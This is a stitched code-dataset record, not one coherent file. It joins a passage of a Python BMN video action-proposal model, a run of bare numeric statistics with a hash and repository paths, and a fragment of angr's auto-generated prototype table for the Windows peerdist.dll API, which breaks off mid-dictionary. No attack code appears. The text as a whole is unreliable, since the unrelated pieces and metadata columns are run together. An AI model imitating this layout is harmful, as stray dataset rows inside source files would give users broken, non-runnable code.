            end_bins[-1] = 1  # [0,0,0...,0,1]
            for idx in range(1, self.tscale - 1):
                if start_scores[idx] > start_scores[
                        idx + 1] and start_scores[idx] > start_scores[idx - 1]:
                    start_bins[idx] = 1
                elif start_scores[idx] > (0.5 * max_start):
                    start_bins[idx] = 1
                if end_scores[idx] > end_scores[
                        idx + 1] and end_scores[idx] > end_scores[idx - 1]:
                    end_bins[idx] = 1
                elif end_scores[idx] > (0.5 * max_end):
                    end_bins[idx] = 1
            # iterate through all combinations of start_index and end_index
            new_proposals = []
            for idx in range(self.tscale):
                for jdx in range(self.tscale):
                    start_index = jdx
                    end_index = start_index + idx + 1
                    if end_index < self.tscale and start_bins[
                            start_index] == 1 and end_bins[end_index] == 1:
                        tmin = start_index / self.tscale
                        tmax = end_index / self.tscale
                        tmin_score = start_scores[start_index]
                        tmax_score = end_scores[end_index]
                        cls_score = cls_confidence[idx, jdx]
                        reg_score = reg_confidence[idx, jdx]
                        # Final score fuses boundary and confidence scores.
                        score = tmin_score * tmax_score * cls_score * reg_score
                        new_proposals.append([
                            tmin, tmax, tmin_score, tmax_score, cls_score,
                            reg_score, score
                        ])
            # NOTE(review): np.stack raises on an empty list — if no valid
            # start/end pair fires this crashes; confirm that is acceptable.
            new_proposals = np.stack(new_proposals)
            video_info = dict(video_meta[0])
            proposal_list_text = post_processing(new_proposals, video_info,
                                                 self.soft_nms_alpha,
                                                 self.soft_nms_low_threshold,
                                                 self.soft_nms_high_threshold,
                                                 self.post_process_top_k,
                                                 self.feature_extraction_interval)
            # Tag every surviving proposal with the query text it came from.
            proposal_list_text = [ dict(score=proposal['score'], segment=proposal['segment'], class_text=text)
                                  for proposal in proposal_list_text]
            proposal_list += proposal_list_text
        output = [
            dict(
                video_name=video_info['video_name'],
                proposal_list=proposal_list)
        ]
        return output

    def forward_train(self, raw_feature, video_meta, label_confidence, label_start, label_end):
        """Define the computation performed at every call when training."""
        confidence_map, start, end = self._forward(raw_feature, video_meta)
        loss = self.loss_cls(confidence_map, start, end, label_confidence, label_start, label_end, self.bm_mask.to(raw_feature.device))
        loss_dict = dict(loss=loss[0])
        return loss_dict

    def generate_labels(self, gt_bbox):
        """Generate training labels (confidence map plus start/end curves)
        from per-video ground-truth (tmin, tmax) boxes."""
        match_score_confidence_list = []
        match_score_start_list = []
        match_score_end_list = []
        for every_gt_bbox in gt_bbox:
            gt_iou_map = []
            for start, end in every_gt_bbox:
                if isinstance(start, torch.Tensor):
                    start = start.numpy()
                if isinstance(end, torch.Tensor):
                    end = end.numpy()
                current_gt_iou_map = temporal_iou(self.match_map[:, 0],
                                                  self.match_map[:, 1], start,
                                                  end)
                current_gt_iou_map = np.reshape(current_gt_iou_map,
                                                [self.tscale, self.tscale])
                gt_iou_map.append(current_gt_iou_map)
            gt_iou_map = np.array(gt_iou_map).astype(np.float32)
            # Keep, per cell, the best IoU over all ground-truth boxes.
            gt_iou_map = np.max(gt_iou_map, axis=0)
            gt_tmins = every_gt_bbox[:, 0]
            gt_tmaxs = every_gt_bbox[:, 1]
            # Boundary regions span 3 temporal bins centered on each edge.
            gt_len_pad = 3 * (1. / self.tscale)
            gt_start_bboxs = np.stack(
                (gt_tmins - gt_len_pad / 2, gt_tmins + gt_len_pad / 2), axis=1)
            gt_end_bboxs = np.stack(
                (gt_tmaxs - gt_len_pad / 2, gt_tmaxs + gt_len_pad / 2), axis=1)
            match_score_start = []
            match_score_end = []
            for anchor_tmin, anchor_tmax in zip(self.anchors_tmins,
                                                self.anchors_tmaxs):
                match_score_start.append(
                    np.max(
                        temporal_iop(anchor_tmin, anchor_tmax,
                                     gt_start_bboxs[:, 0], gt_start_bboxs[:,
                                                                          1])))
                match_score_end.append(
                    np.max(
                        temporal_iop(anchor_tmin, anchor_tmax,
                                     gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))
            match_score_confidence_list.append(gt_iou_map)
            match_score_start_list.append(match_score_start)
            match_score_end_list.append(match_score_end)
        match_score_confidence_list = torch.Tensor(match_score_confidence_list)
        match_score_start_list = torch.Tensor(match_score_start_list)
        match_score_end_list = torch.Tensor(match_score_end_list)
        return (match_score_confidence_list, match_score_start_list,
                match_score_end_list)

    def forward(self,
                raw_feature,
                gt_bbox=None,
                video_meta=None,
                return_loss=True):
        """Define the computation performed at every call."""
        if return_loss:
            label_confidence, label_start, label_end = (
                self.generate_labels(gt_bbox))
            device = raw_feature.device
            label_confidence = label_confidence.to(device)
            label_start = label_start.to(device)
            label_end = label_end.to(device)
            return self.forward_train(raw_feature, video_meta, label_confidence, label_start, label_end)
        return self.forward_test(raw_feature, video_meta)

    @staticmethod
    def _get_interp1d_bin_mask(seg_tmin, seg_tmax, tscale, num_samples,
                               num_samples_per_bin):
        """Generate sample mask for a boundary-matching pair."""
        plen = float(seg_tmax - seg_tmin)
        plen_sample = plen / (num_samples * num_samples_per_bin - 1.0)
        total_samples = [
            seg_tmin + plen_sample * i
            for i in range(num_samples * num_samples_per_bin)
        ]
        p_mask = []
        for idx in range(num_samples):
            bin_samples = total_samples[idx * num_samples_per_bin:(idx + 1) *
                                        num_samples_per_bin]
            bin_vector = np.zeros(tscale)
            for sample in bin_samples:
                sample_upper = math.ceil(sample)
                sample_decimal, sample_down = math.modf(sample)
                # Linear interpolation: split each sample's weight between
                # its two neighbouring integer positions (when in range).
                if 0 <= int(sample_down) <= (tscale - 1):
                    bin_vector[int(sample_down)] += 1 - sample_decimal
                if 0 <= int(sample_upper) <= (tscale - 1):
                    bin_vector[int(sample_upper)] += sample_decimal
            bin_vector = 1.0 / num_samples_per_bin * bin_vector
            p_mask.append(bin_vector)
        p_mask = np.stack(p_mask, axis=1)
        return p_mask

    def _get_interp1d_mask(self):
        """Generate sample mask for each point in Boundary-Matching Map."""
        mask_mat = []
        for start_index in range(self.tscale):
            mask_mat_vector = []
            for duration_index in range(self.tscale):
                if start_index + duration_index < self.tscale:
                    p_tmin = start_index
                    p_tmax = start_index + duration_index
                    center_len = float(p_tmax - p_tmin) + 1
                    # Extend the sampling window beyond the proposal by
                    # `boundary_ratio` on each side for boundary context.
                    sample_tmin = p_tmin - (center_len * self.boundary_ratio)
                    sample_tmax = p_tmax + (center_len * self.boundary_ratio)
                    p_mask = self._get_interp1d_bin_mask(
                        sample_tmin, sample_tmax, self.tscale,
                        self.num_samples, self.num_samples_per_bin)
                else:
                    # Invalid (out-of-range) proposals get an all-zero mask.
                    p_mask = np.zeros([self.tscale, self.num_samples])
                mask_mat_vector.append(p_mask)
            mask_mat_vector = np.stack(mask_mat_vector, axis=2)
            mask_mat.append(mask_mat_vector)
        mask_mat = np.stack(mask_mat, axis=3)
        mask_mat = mask_mat.astype(np.float32)
        # Registered as a non-trainable parameter so it moves with .to(device).
        self.sample_mask = nn.Parameter(
            torch.tensor(mask_mat).view(self.tscale, -1), requires_grad=False)

    def _get_bm_mask(self):
        """Generate Boundary-Matching Mask (upper-triangular validity mask
        over the duration x start grid)."""
        bm_mask = []
        for idx in range(self.tscale):
            mask_vector = [1] * (self.tscale - idx) + [0] * idx
            bm_mask.append(mask_vector)
        bm_mask = torch.tensor(bm_mask, dtype=torch.float)
        return bm_mask
| 43.054428
| 161
| 0.58036
| 5,614
| 46,671
| 4.498575
| 0.064482
| 0.027796
| 0.027796
| 0.019006
| 0.874084
| 0.855593
| 0.829103
| 0.820867
| 0.819165
| 0.81667
| 0
| 0.018048
| 0.330419
| 46,671
| 1,083
| 162
| 43.094183
| 0.790112
| 0.157807
| 0
| 0.830424
| 0
| 0
| 0.006593
| 0.001538
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0399
| false
| 0
| 0.018703
| 0
| 0.097257
| 0.001247
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
996b79602b990fa581de48eba74d3240e5947e77
| 23,974
|
py
|
Python
|
angr/procedures/definitions/win32_peerdist.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_peerdist.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_peerdist.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
# Module-level logger for this auto-generated library-definition module.
_l = logging.getLogger(name=__name__)
# SimLibrary instance that collects the function prototypes for the
# Windows Peer Distribution (BranchCache) DLL.
lib = SimLibrary()
# Default calling conventions: 32-bit Windows APIs use stdcall; 64-bit
# use the Microsoft x64 convention.
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("peerdist.dll")
# Auto-generated prototype table mapping each exported peerdist.dll function
# name to its SimTypeFunction signature (argument types, return type, and
# argument names). Registered with `lib` at the bottom of the module.
prototypes = \
    {
        # PeerDistStartup(dwVersionRequested, phPeerDist, pdwSupportedVersion) -> UInt32
        'PeerDistStartup': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwVersionRequested", "phPeerDist", "pdwSupportedVersion"]),
        # PeerDistShutdown(hPeerDist) -> UInt32
        'PeerDistShutdown': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist"]),
        # PeerDistGetStatus(hPeerDist, pPeerDistStatus) -> UInt32
        'PeerDistGetStatus': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="PEERDIST_STATUS"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "pPeerDistStatus"]),
        # PeerDistRegisterForStatusChangeNotification(hPeerDist, hCompletionPort, ulCompletionKey, lpOverlapped, pPeerDistStatus) -> UInt32
        'PeerDistRegisterForStatusChangeNotification': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="PEERDIST_STATUS"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hCompletionPort", "ulCompletionKey", "lpOverlapped", "pPeerDistStatus"]),
        # PeerDistUnregisterForStatusChangeNotification(hPeerDist) -> UInt32
        'PeerDistUnregisterForStatusChangeNotification': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist"]),
        # PeerDistServerPublishStream(hPeerDist, cbContentIdentifier, pContentIdentifier, cbContentLength, pPublishOptions, hCompletionPort, ulCompletionKey, phStream) -> UInt32
        'PeerDistServerPublishStream': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeLongLong(signed=False, label="UInt64"), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "dwFlags": SimTypeInt(signed=False, label="UInt32")}, name="PEERDIST_PUBLICATION_OPTIONS", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "cbContentIdentifier", "pContentIdentifier", "cbContentLength", "pPublishOptions", "hCompletionPort", "ulCompletionKey", "phStream"]),
        # PeerDistServerPublishAddToStream(hPeerDist, hStream, cbNumberOfBytes, pBuffer, lpOverlapped) -> UInt32
        'PeerDistServerPublishAddToStream': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hStream", "cbNumberOfBytes", "pBuffer", "lpOverlapped"]),
        # PeerDistServerPublishCompleteStream(hPeerDist, hStream, lpOverlapped) -> UInt32
        'PeerDistServerPublishCompleteStream': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hStream", "lpOverlapped"]),
        # PeerDistServerCloseStreamHandle(hPeerDist, hStream) -> UInt32
        'PeerDistServerCloseStreamHandle': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hStream"]),
        # PeerDistServerUnpublish(hPeerDist, cbContentIdentifier, pContentIdentifier) -> UInt32
        'PeerDistServerUnpublish': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "cbContentIdentifier", "pContentIdentifier"]),
        # PeerDistServerOpenContentInformation(hPeerDist, cbContentIdentifier, pContentIdentifier, ullContentOffset, cbContentLength, hCompletionPort, ulCompletionKey, phContentInfo) -> UInt32
        'PeerDistServerOpenContentInformation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeLongLong(signed=False, label="UInt64"), SimTypeLongLong(signed=False, label="UInt64"), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "cbContentIdentifier", "pContentIdentifier", "ullContentOffset", "cbContentLength", "hCompletionPort", "ulCompletionKey", "phContentInfo"]),
        # PeerDistServerRetrieveContentInformation(hPeerDist, hContentInfo, cbMaxNumberOfBytes, pBuffer, lpOverlapped) -> UInt32
        'PeerDistServerRetrieveContentInformation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentInfo", "cbMaxNumberOfBytes", "pBuffer", "lpOverlapped"]),
        # PeerDistServerCloseContentInformation(hPeerDist, hContentInfo) -> UInt32
        'PeerDistServerCloseContentInformation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentInfo"]),
        # PeerDistServerCancelAsyncOperation(hPeerDist, cbContentIdentifier, pContentIdentifier, pOverlapped) -> UInt32
        'PeerDistServerCancelAsyncOperation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "cbContentIdentifier", "pContentIdentifier", "pOverlapped"]),
        # PeerDistClientOpenContent(hPeerDist, pContentTag, hCompletionPort, ulCompletionKey, phContentHandle) -> UInt32
        'PeerDistClientOpenContent': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Data": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 16)}, name="PEERDIST_CONTENT_TAG", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "pContentTag", "hCompletionPort", "ulCompletionKey", "phContentHandle"]),
        # PeerDistClientCloseContent(hPeerDist, hContentHandle) -> UInt32
        'PeerDistClientCloseContent': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle"]),
        # PeerDistClientAddContentInformation(hPeerDist, hContentHandle, cbNumberOfBytes, pBuffer, lpOverlapped) -> UInt32
        'PeerDistClientAddContentInformation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "cbNumberOfBytes", "pBuffer", "lpOverlapped"]),
        # PeerDistClientCompleteContentInformation(hPeerDist, hContentHandle, lpOverlapped) -> UInt32
        'PeerDistClientCompleteContentInformation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "lpOverlapped"]),
        # PeerDistClientAddData(hPeerDist, hContentHandle, cbNumberOfBytes, pBuffer, lpOverlapped) -> UInt32
        'PeerDistClientAddData': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "cbNumberOfBytes", "pBuffer", "lpOverlapped"]),
        # PeerDistClientBlockRead(hPeerDist, hContentHandle, cbMaxNumberOfBytes, pBuffer, dwTimeoutInMilliseconds, lpOverlapped) -> UInt32
        'PeerDistClientBlockRead': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "cbMaxNumberOfBytes", "pBuffer", "dwTimeoutInMilliseconds", "lpOverlapped"]),
        # PeerDistClientStreamRead(hPeerDist, hContentHandle, cbMaxNumberOfBytes, pBuffer, dwTimeoutInMilliseconds, lpOverlapped) -> UInt32
        'PeerDistClientStreamRead': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "cbMaxNumberOfBytes", "pBuffer", "dwTimeoutInMilliseconds", "lpOverlapped"]),
        # PeerDistClientFlushContent(hPeerDist, pContentTag, hCompletionPort, ulCompletionKey, lpOverlapped) -> UInt32
        'PeerDistClientFlushContent': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Data": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 16)}, name="PEERDIST_CONTENT_TAG", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "pContentTag", "hCompletionPort", "ulCompletionKey", "lpOverlapped"]),
        # PeerDistClientCancelAsyncOperation(hPeerDist, hContentHandle, pOverlapped) -> UInt32
